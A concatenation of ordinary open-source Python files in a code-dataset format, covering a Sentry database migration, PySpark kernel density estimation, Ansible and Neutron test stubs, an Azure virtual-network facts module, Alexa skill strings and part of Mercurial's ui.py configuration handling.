response = out.getvalue().strip() # capture output and strip newline
self.assertTrue("Current version" in response)
def test_empty_input(self):
        # running schema_salad tool without any args
args = []
with captured_output() as (out, err):
cli_parser.main(args)
response = out.getvalue().strip()
self.assertTrue("error: too few arguments" in response)
| apache-2.0 |
NickPresta/sentry | src/sentry/migrations/0032_auto__add_eventmeta.py | 7 | 14351 | # encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'GroupMeta'
db.create_table('sentry_groupmeta', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('group', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['sentry.Group'])),
('key', self.gf('django.db.models.fields.CharField')(max_length=64)),
('value', self.gf('django.db.models.fields.TextField')()),
))
db.send_create_signal('sentry', ['GroupMeta'])
# Adding unique constraint on 'GroupMeta', fields ['group', 'key', 'value']
db.create_unique('sentry_groupmeta', ['group_id', 'key'])
def backwards(self, orm):
# Removing unique constraint on 'GroupMeta', fields ['group', 'key', 'value']
db.delete_unique('sentry_groupmeta', ['group_id', 'key'])
# Deleting model 'GroupMeta'
db.delete_table('sentry_groupmeta')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'sentry.event': {
'Meta': {'object_name': 'Event', 'db_table': "'sentry_message'"},
'checksum': ('django.db.models.fields.CharField', [], {'max_length': '32', 'db_index': 'True'}),
'culprit': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'db_column': "'view'", 'blank': 'True'}),
'data': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'event_id': ('django.db.models.fields.CharField', [], {'max_length': '32', 'unique': 'True', 'null': 'True', 'db_column': "'message_id'"}),
'group': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'event_set'", 'null': 'True', 'to': "orm['sentry.Group']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'level': ('django.db.models.fields.PositiveIntegerField', [], {'default': '40', 'db_index': 'True', 'blank': 'True'}),
'logger': ('django.db.models.fields.CharField', [], {'default': "'root'", 'max_length': '64', 'db_index': 'True', 'blank': 'True'}),
'message': ('django.db.models.fields.TextField', [], {}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'server_name': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'db_index': 'True'}),
'site': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'db_index': 'True'}),
'time_spent': ('django.db.models.fields.FloatField', [], {'null': 'True'})
},
'sentry.filtervalue': {
'Meta': {'unique_together': "(('project', 'key', 'value'),)", 'object_name': 'FilterValue'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'sentry.group': {
'Meta': {'unique_together': "(('project', 'logger', 'culprit', 'checksum'),)", 'object_name': 'Group', 'db_table': "'sentry_groupedmessage'"},
'checksum': ('django.db.models.fields.CharField', [], {'max_length': '32', 'db_index': 'True'}),
'culprit': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'db_column': "'view'", 'blank': 'True'}),
'data': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'level': ('django.db.models.fields.PositiveIntegerField', [], {'default': '40', 'db_index': 'True', 'blank': 'True'}),
'logger': ('django.db.models.fields.CharField', [], {'default': "'root'", 'max_length': '64', 'db_index': 'True', 'blank': 'True'}),
'message': ('django.db.models.fields.TextField', [], {}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'status': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0', 'db_index': 'True'}),
'time_spent_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'time_spent_total': ('django.db.models.fields.FloatField', [], {'default': '0'}),
'times_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '1', 'db_index': 'True'}),
'views': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['sentry.View']", 'symmetrical': 'False', 'blank': 'True'})
},
'sentry.groupmeta': {
'Meta': {'unique_together': "(('group', 'key', 'value'),)", 'object_name': 'GroupMeta'},
'group': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'value': ('django.db.models.fields.TextField', [], {})
},
'sentry.messagecountbyminute': {
'Meta': {'unique_together': "(('project', 'group', 'date'),)", 'object_name': 'MessageCountByMinute'},
'date': ('django.db.models.fields.DateTimeField', [], {}),
'group': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'time_spent_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'time_spent_total': ('django.db.models.fields.FloatField', [], {'default': '0'}),
'times_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'})
},
'sentry.messagefiltervalue': {
'Meta': {'unique_together': "(('project', 'key', 'value', 'group'),)", 'object_name': 'MessageFilterValue'},
'group': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'times_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'sentry.messageindex': {
'Meta': {'unique_together': "(('column', 'value', 'object_id'),)", 'object_name': 'MessageIndex'},
'column': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'object_id': ('django.db.models.fields.PositiveIntegerField', [], {}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '128'})
},
'sentry.project': {
'Meta': {'object_name': 'Project'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'owned_project_set'", 'null': 'True', 'to': "orm['auth.User']"}),
'public': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'status': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0', 'db_index': 'True'})
},
'sentry.projectdomain': {
'Meta': {'unique_together': "(('project', 'domain'),)", 'object_name': 'ProjectDomain'},
'domain': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'domain_set'", 'to': "orm['sentry.Project']"})
},
'sentry.projectmember': {
'Meta': {'unique_together': "(('project', 'user'),)", 'object_name': 'ProjectMember'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'member_set'", 'to': "orm['sentry.Project']"}),
'public_key': ('django.db.models.fields.CharField', [], {'max_length': '32', 'unique': 'True', 'null': 'True'}),
'secret_key': ('django.db.models.fields.CharField', [], {'max_length': '32', 'unique': 'True', 'null': 'True'}),
'type': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'project_set'", 'to': "orm['auth.User']"})
},
'sentry.projectoption': {
'Meta': {'unique_together': "(('project', 'key', 'value'),)", 'object_name': 'ProjectOption', 'db_table': "'sentry_projectoptions'"},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Project']"}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'sentry.view': {
'Meta': {'object_name': 'View'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'path': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '100'}),
'verbose_name': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'}),
'verbose_name_plural': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'})
}
}
complete_apps = ['sentry']
| bsd-3-clause |
skonto/spark | python/pyspark/mllib/stat/KernelDensity.py | 118 | 1997 | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import sys
if sys.version > '3':
xrange = range
import numpy as np
from pyspark.mllib.common import callMLlibFunc
from pyspark.rdd import RDD
class KernelDensity(object):
"""
Estimate probability density at required points given an RDD of samples
from the population.
>>> kd = KernelDensity()
>>> sample = sc.parallelize([0.0, 1.0])
>>> kd.setSample(sample)
>>> kd.estimate([0.0, 1.0])
array([ 0.12938758, 0.12938758])
"""
def __init__(self):
self._bandwidth = 1.0
self._sample = None
def setBandwidth(self, bandwidth):
"""Set bandwidth of each sample. Defaults to 1.0"""
self._bandwidth = bandwidth
def setSample(self, sample):
"""Set sample points from the population. Should be a RDD"""
if not isinstance(sample, RDD):
raise TypeError("samples should be a RDD, received %s" % type(sample))
self._sample = sample
def estimate(self, points):
"""Estimate the probability density at points"""
points = list(points)
densities = callMLlibFunc(
"estimateKernelDensity", self._sample, self._bandwidth, points)
return np.asarray(densities)
| apache-2.0 |
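A minimal usage sketch for the KernelDensity class above (not part of the original file); it assumes a live SparkContext named sc, as the doctest does, and the standard pyspark import path:
from pyspark.mllib.stat import KernelDensity
kd = KernelDensity()
kd.setSample(sc.parallelize([1.0, 2.0, 2.5, 3.0]))  # population samples as an RDD
kd.setBandwidth(0.5)                                 # kernel bandwidth; defaults to 1.0
print(kd.estimate([2.0, 2.75]))                      # numpy array of densities at the query points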
kvar/ansible | test/units/modules/network/cnos/test_cnos_logging.py | 23 | 2268 | #
# (c) 2018 Red Hat Inc.
# Copyright (C) 2017 Lenovo.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from units.compat.mock import patch
from ansible.modules.network.cnos import cnos_logging
from units.modules.utils import set_module_args
from .cnos_module import TestCnosModule, load_fixture
class TestCnosLoggingModule(TestCnosModule):
module = cnos_logging
def setUp(self):
super(TestCnosLoggingModule, self).setUp()
self.mock_get_config = patch('ansible.modules.network.cnos.cnos_logging.get_config')
self.get_config = self.mock_get_config.start()
self.mock_load_config = patch('ansible.modules.network.cnos.cnos_logging.load_config')
self.load_config = self.mock_load_config.start()
def tearDown(self):
super(TestCnosLoggingModule, self).tearDown()
self.mock_get_config.stop()
self.mock_load_config.stop()
def load_fixtures(self, commands=None):
self.get_config.return_value = load_fixture('cnos_logging_config.cfg')
self.load_config.return_value = None
def test_cnos_logging_buffer_size_changed_implicit(self):
set_module_args(dict(dest='logfile', name='anil'))
commands = ['logging logfile anil 5 size 10485760']
self.execute_module(changed=True, commands=commands)
def test_cnos_logging_logfile_size_changed_explicit(self):
set_module_args(dict(dest='logfile', name='anil', level='4', size=6000))
commands = ['logging logfile anil 4 size 6000']
self.execute_module(changed=True, commands=commands)
| gpl-3.0 |
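A hedged sketch of how one further case could be added to the test class above; it reuses the same fixture wiring, only changes the input/expected-command pair, and assumes the module renders level 7 the same way it renders level 4 in the explicit test:
    def test_cnos_logging_logfile_level_changed(self):
        # hypothetical extra case, mirroring the explicit-size test above
        set_module_args(dict(dest='logfile', name='anil', level='7', size=6000))
        commands = ['logging logfile anil 7 size 6000']
        self.execute_module(changed=True, commands=commands)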
eayunstack/neutron | neutron/tests/unit/extension_stubs.py | 5 | 2334 | # Copyright 2011 OpenStack Foundation.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import abc
from neutron_lib.api import extensions as api_extensions
from neutron_lib.services import base
from neutron import wsgi
class StubExtension(api_extensions.ExtensionDescriptor):
def __init__(self, alias="stub_extension", optional=None):
self.alias = alias
self.optional = optional or []
def get_name(self):
return "Stub Extension"
def get_alias(self):
return self.alias
def get_description(self):
return ""
def get_updated(self):
return ""
def get_optional_extensions(self):
return self.optional
class StubExtensionWithReqs(StubExtension):
def get_required_extensions(self):
return ["foo"]
class StubPlugin(object):
def __init__(self, supported_extensions=None):
supported_extensions = supported_extensions or []
self.supported_extension_aliases = supported_extensions
class ExtensionExpectingPluginInterface(StubExtension):
"""Expect plugin to implement all methods in StubPluginInterface.
This extension expects plugin to implement all the methods defined
in StubPluginInterface.
"""
def get_plugin_interface(self):
return StubPluginInterface
class StubPluginInterface(base.ServicePluginBase):
@abc.abstractmethod
def get_foo(self, bar=None):
pass
def get_plugin_type(self):
pass
def get_plugin_description(self):
pass
class StubBaseAppController(wsgi.Controller):
def index(self, request):
return "base app index"
def show(self, request, id):
return {'fort': 'knox'}
def update(self, request, id):
return {'uneditable': 'original_value'}
| apache-2.0 |
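An illustrative sketch (not part of the original file) of how these stubs fit together in a test; the variable names are illustrative only. A StubPlugin advertises extension aliases, and StubExtensionWithReqs declares that it requires the "foo" alias:
stub_plugin = StubPlugin(supported_extensions=['foo', 'stub_extension'])
stub_ext = StubExtensionWithReqs(alias='stub_extension')
assert stub_ext.get_required_extensions() == ['foo']
# every required alias must be advertised by the plugin for loading to succeed
assert set(stub_ext.get_required_extensions()) <= set(stub_plugin.supported_extension_aliases)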
richardcs/ansible | lib/ansible/modules/cloud/azure/azure_rm_virtualnetwork_facts.py | 7 | 5178 | #!/usr/bin/python
#
# Copyright (c) 2016 Matt Davis, <[email protected]>
# Chris Houseknecht, <[email protected]>
#
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: azure_rm_virtualnetwork_facts
version_added: "2.1"
short_description: Get virtual network facts.
description:
- Get facts for a specific virtual network or all virtual networks within a resource group.
options:
name:
description:
            - Only show results for a specific virtual network.
resource_group:
description:
- Limit results by resource group. Required when filtering by name.
tags:
description:
- Limit results by providing a list of tags. Format tags as 'key' or 'key:value'.
extends_documentation_fragment:
- azure
author:
- "Chris Houseknecht (@chouseknecht) <[email protected]>"
- "Matt Davis (@nitzmahone) <[email protected]>"
'''
EXAMPLES = '''
- name: Get facts for one virtual network
azure_rm_virtualnetwork_facts:
resource_group: Testing
name: secgroup001
- name: Get facts for all virtual networks
azure_rm_virtualnetwork_facts:
resource_group: Testing
- name: Get facts by tags
azure_rm_virtualnetwork_facts:
tags:
- testing
'''
RETURN = '''
azure_virtualnetworks:
description: List of virtual network dicts.
returned: always
type: list
example: [{
"etag": 'W/"532ba1be-ae71-40f2-9232-3b1d9cf5e37e"',
"id": "/subscriptions/XXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXX/resourceGroups/Testing/providers/Microsoft.Network/virtualNetworks/vnet2001",
"location": "eastus2",
"name": "vnet2001",
"properties": {
"addressSpace": {
"addressPrefixes": [
"10.10.0.0/16"
]
},
"provisioningState": "Succeeded",
"resourceGuid": "a7ba285f-f7e7-4e17-992a-de4d39f28612",
"subnets": []
},
"type": "Microsoft.Network/virtualNetworks"
}]
'''
try:
from msrestazure.azure_exceptions import CloudError
except:
# This is handled in azure_rm_common
pass
from ansible.module_utils.azure_rm_common import AzureRMModuleBase
AZURE_OBJECT_CLASS = 'VirtualNetwork'
class AzureRMNetworkInterfaceFacts(AzureRMModuleBase):
def __init__(self):
self.module_arg_spec = dict(
name=dict(type='str'),
resource_group=dict(type='str'),
tags=dict(type='list'),
)
self.results = dict(
changed=False,
ansible_facts=dict(azure_virtualnetworks=[])
)
self.name = None
self.resource_group = None
self.tags = None
super(AzureRMNetworkInterfaceFacts, self).__init__(self.module_arg_spec,
supports_tags=False,
facts_module=True)
def exec_module(self, **kwargs):
for key in self.module_arg_spec:
setattr(self, key, kwargs[key])
if self.name is not None:
self.results['ansible_facts']['azure_virtualnetworks'] = self.get_item()
else:
self.results['ansible_facts']['azure_virtualnetworks'] = self.list_items()
return self.results
def get_item(self):
self.log('Get properties for {0}'.format(self.name))
item = None
results = []
try:
item = self.network_client.virtual_networks.get(self.resource_group, self.name)
except CloudError:
pass
if item and self.has_tags(item.tags, self.tags):
results = [self.serialize_obj(item, AZURE_OBJECT_CLASS)]
return results
def list_resource_group(self):
self.log('List items for resource group')
try:
response = self.network_client.virtual_networks.list(self.resource_group)
except CloudError as exc:
self.fail("Failed to list for resource group {0} - {1}".format(self.resource_group, str(exc)))
results = []
for item in response:
if self.has_tags(item.tags, self.tags):
results.append(self.serialize_obj(item, AZURE_OBJECT_CLASS))
return results
def list_items(self):
self.log('List all for items')
try:
response = self.network_client.virtual_networks.list_all()
except CloudError as exc:
self.fail("Failed to list all items - {0}".format(str(exc)))
results = []
for item in response:
if self.has_tags(item.tags, self.tags):
results.append(self.serialize_obj(item, AZURE_OBJECT_CLASS))
return results
def main():
AzureRMNetworkInterfaceFacts()
if __name__ == '__main__':
main()
| gpl-3.0 |
benvand/alexa-stackoverflow | strings.py | 1 | 1340 | """Strings for Alexa to say"""
from settings import SITE_NAME_SPEAKABLE
SITE_NAME = SITE_NAME_SPEAKABLE
# Breaks
BREAK = '<break strength="{strength}">'
XS_BREAK = BREAK.format(strength='x-strong')
S_BREAK = BREAK.format(strength='strong')
# Greet and dismiss
WELCOME_REPROMPT = \
"""
You can ask {site_name} for an answer to a question.
For example, try, Ask {site_name}{break1} what is node j s.
""".format(site_name=SITE_NAME, break1=S_BREAK)
WELCOME = ("Welcome to the Alexa {site_name} Skill. " + WELCOME_REPROMPT).format(site_name=SITE_NAME)
GOODBYE = "Thank you for trying the Alexa {site_name} app.".format(site_name=SITE_NAME)
# Report of what has been found
REPORT_ON_QUESTION = "The closest question match on " + SITE_NAME + ' is {question}...'
REPORT_ON_ANSWER = "The top rated answer for that question by {answerer} with {votes} upvotes is {answer}."
REPORT = S_BREAK.join([REPORT_ON_QUESTION, REPORT_ON_ANSWER])
# Failure to parse and reprompt
FAILURE = "I'm sorry, I didn't catch your question. Please try again."
PROMPT_ASK = "Your questions will be relayed to {site_name}.".format(site_name=SITE_NAME)
# Nothing found responses
NO_QUESTIONS = "I'm sorry, that didn't return any results on {site_name}.".format(site_name=SITE_NAME)
NO_ANSWERS = NO_QUESTIONS + " However, there is a question waiting to be answered."
| mit |
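An illustrative sketch (not from the original module) of filling in the REPORT template above; the question, answerer, votes and answer values are hypothetical:
speech = REPORT.format(
    question="how do I merge two dictionaries in Python",
    answerer="a Stack Overflow user",
    votes=1200,
    answer="use the update method or dictionary unpacking",
)
# speech now contains both sentences joined by the SSML break defined above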
seewindcn/tortoisehg | src/mercurial/ui.py | 1 | 45732 | # ui.py - user interface bits for mercurial
#
# Copyright 2005-2007 Matt Mackall <[email protected]>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
from __future__ import absolute_import
import errno
import getpass
import inspect
import os
import re
import socket
import sys
import tempfile
import traceback
from .i18n import _
from .node import hex
from . import (
config,
error,
formatter,
progress,
scmutil,
util,
)
samplehgrcs = {
'user':
"""# example user config (see "hg help config" for more info)
[ui]
# name and email, e.g.
# username = Jane Doe <[email protected]>
username =
[extensions]
# uncomment these lines to enable some popular extensions
# (see "hg help extensions" for more info)
#
# pager =
# progress =
# color =""",
'cloned':
"""# example repository config (see "hg help config" for more info)
[paths]
default = %s
# path aliases to other clones of this repo in URLs or filesystem paths
# (see "hg help config.paths" for more info)
#
# default-push = ssh://[email protected]/hg/jdoes-fork
# my-fork = ssh://[email protected]/hg/jdoes-fork
# my-clone = /home/jdoe/jdoes-clone
[ui]
# name and email (local to this repository, optional), e.g.
# username = Jane Doe <[email protected]>
""",
'local':
"""# example repository config (see "hg help config" for more info)
[paths]
# path aliases to other clones of this repo in URLs or filesystem paths
# (see "hg help config.paths" for more info)
#
# default = http://example.com/hg/example-repo
# default-push = ssh://[email protected]/hg/jdoes-fork
# my-fork = ssh://[email protected]/hg/jdoes-fork
# my-clone = /home/jdoe/jdoes-clone
[ui]
# name and email (local to this repository, optional), e.g.
# username = Jane Doe <[email protected]>
""",
'global':
"""# example system-wide hg config (see "hg help config" for more info)
[extensions]
# uncomment these lines to enable some popular extensions
# (see "hg help extensions" for more info)
#
# blackbox =
# progress =
# color =
# pager =""",
}
class ui(object):
def __init__(self, src=None):
# _buffers: used for temporary capture of output
self._buffers = []
# 3-tuple describing how each buffer in the stack behaves.
# Values are (capture stderr, capture subprocesses, apply labels).
self._bufferstates = []
# When a buffer is active, defines whether we are expanding labels.
# This exists to prevent an extra list lookup.
self._bufferapplylabels = None
self.quiet = self.verbose = self.debugflag = self.tracebackflag = False
self._reportuntrusted = True
self._ocfg = config.config() # overlay
self._tcfg = config.config() # trusted
self._ucfg = config.config() # untrusted
self._trustusers = set()
self._trustgroups = set()
self.callhooks = True
if src:
self.fout = src.fout
self.ferr = src.ferr
self.fin = src.fin
self._tcfg = src._tcfg.copy()
self._ucfg = src._ucfg.copy()
self._ocfg = src._ocfg.copy()
self._trustusers = src._trustusers.copy()
self._trustgroups = src._trustgroups.copy()
self.environ = src.environ
self.callhooks = src.callhooks
self.fixconfig()
else:
self.fout = sys.stdout
self.ferr = sys.stderr
self.fin = sys.stdin
# shared read-only environment
self.environ = os.environ
# we always trust global config files
for f in scmutil.rcpath():
self.readconfig(f, trust=True)
def copy(self):
return self.__class__(self)
def formatter(self, topic, opts):
return formatter.formatter(self, topic, opts)
def _trusted(self, fp, f):
st = util.fstat(fp)
if util.isowner(st):
return True
tusers, tgroups = self._trustusers, self._trustgroups
if '*' in tusers or '*' in tgroups:
return True
user = util.username(st.st_uid)
group = util.groupname(st.st_gid)
if user in tusers or group in tgroups or user == util.username():
return True
if self._reportuntrusted:
self.warn(_('not trusting file %s from untrusted '
'user %s, group %s\n') % (f, user, group))
return False
def readconfig(self, filename, root=None, trust=False,
sections=None, remap=None):
try:
fp = open(filename)
except IOError:
if not sections: # ignore unless we were looking for something
return
raise
cfg = config.config()
trusted = sections or trust or self._trusted(fp, filename)
try:
cfg.read(filename, fp, sections=sections, remap=remap)
fp.close()
except error.ConfigError as inst:
if trusted:
raise
self.warn(_("ignored: %s\n") % str(inst))
if self.plain():
for k in ('debug', 'fallbackencoding', 'quiet', 'slash',
'logtemplate', 'statuscopies', 'style',
'traceback', 'verbose'):
if k in cfg['ui']:
del cfg['ui'][k]
for k, v in cfg.items('defaults'):
del cfg['defaults'][k]
# Don't remove aliases from the configuration if in the exceptionlist
if self.plain('alias'):
for k, v in cfg.items('alias'):
del cfg['alias'][k]
if self.plain('revsetalias'):
for k, v in cfg.items('revsetalias'):
del cfg['revsetalias'][k]
if trusted:
self._tcfg.update(cfg)
self._tcfg.update(self._ocfg)
self._ucfg.update(cfg)
self._ucfg.update(self._ocfg)
if root is None:
root = os.path.expanduser('~')
self.fixconfig(root=root)
def fixconfig(self, root=None, section=None):
if section in (None, 'paths'):
# expand vars and ~
# translate paths relative to root (or home) into absolute paths
root = root or os.getcwd()
for c in self._tcfg, self._ucfg, self._ocfg:
for n, p in c.items('paths'):
if not p:
continue
if '%%' in p:
self.warn(_("(deprecated '%%' in path %s=%s from %s)\n")
% (n, p, self.configsource('paths', n)))
p = p.replace('%%', '%')
p = util.expandpath(p)
if not util.hasscheme(p) and not os.path.isabs(p):
p = os.path.normpath(os.path.join(root, p))
c.set("paths", n, p)
if section in (None, 'ui'):
# update ui options
self.debugflag = self.configbool('ui', 'debug')
self.verbose = self.debugflag or self.configbool('ui', 'verbose')
self.quiet = not self.debugflag and self.configbool('ui', 'quiet')
if self.verbose and self.quiet:
self.quiet = self.verbose = False
self._reportuntrusted = self.debugflag or self.configbool("ui",
"report_untrusted", True)
self.tracebackflag = self.configbool('ui', 'traceback', False)
if section in (None, 'trusted'):
# update trust information
self._trustusers.update(self.configlist('trusted', 'users'))
self._trustgroups.update(self.configlist('trusted', 'groups'))
def backupconfig(self, section, item):
return (self._ocfg.backup(section, item),
self._tcfg.backup(section, item),
self._ucfg.backup(section, item),)
def restoreconfig(self, data):
self._ocfg.restore(data[0])
self._tcfg.restore(data[1])
self._ucfg.restore(data[2])
def setconfig(self, section, name, value, source=''):
for cfg in (self._ocfg, self._tcfg, self._ucfg):
cfg.set(section, name, value, source)
self.fixconfig(section=section)
def _data(self, untrusted):
return untrusted and self._ucfg or self._tcfg
def configsource(self, section, name, untrusted=False):
return self._data(untrusted).source(section, name) or 'none'
def config(self, section, name, default=None, untrusted=False):
if isinstance(name, list):
alternates = name
else:
alternates = [name]
for n in alternates:
value = self._data(untrusted).get(section, n, None)
if value is not None:
name = n
break
else:
value = default
if self.debugflag and not untrusted and self._reportuntrusted:
for n in alternates:
uvalue = self._ucfg.get(section, n)
if uvalue is not None and uvalue != value:
self.debug("ignoring untrusted configuration option "
"%s.%s = %s\n" % (section, n, uvalue))
return value
def configsuboptions(self, section, name, default=None, untrusted=False):
"""Get a config option and all sub-options.
Some config options have sub-options that are declared with the
format "key:opt = value". This method is used to return the main
option and all its declared sub-options.
